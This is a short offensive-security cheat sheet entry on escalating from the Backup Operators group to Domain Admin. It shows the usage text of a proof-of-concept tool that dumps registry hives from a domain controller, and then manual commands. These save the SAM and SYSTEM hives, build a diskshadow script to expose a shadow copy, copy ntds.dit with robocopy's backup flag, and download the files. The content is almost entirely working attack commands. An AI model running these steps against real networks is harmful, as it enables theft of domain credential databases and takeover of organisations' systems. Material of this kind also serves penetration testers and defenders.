Specific Domain Groups

Backup Operator / SeBackupPrivilege


# If you compromise an account member of the group Backup Operators 
# you can become the Domain Admin without RDP or WinRM on the Domain Controller.

# With this POC you don't need to have an access with WinRM or RPD :

.\BackupOperatorToDA.exe -h

Backup Operator to Domain Admin (by @mpgn_x64)

  This tool exist thanks to @filip_dragovic / https://github.com/Wh04m1001

Mandatory argument:
  -t <TARGET>      \\computer_name (ex: \\dc01.pouldard.wizard
  -o <PATH>        Where to store the sam / system / security files (can be UNC path)

Optional arguments:

  -u <USER>        Username
  -p <PASSWORD>    Password
  -d <DOMAIN>      Domain
  -h               help
# Mainly using WinRM

# On a workstation
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

# On a DC (locally)
nano poc.dsh
set context persistent nowriters
add volume c: alias poc
expose %poc% z:
unix2dos poc.dsh

cd C:\Temp
upload poc.dsh
diskshadow /s poc.dsh
robocopy /b z:\windows\ntds . ntds.dit

reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system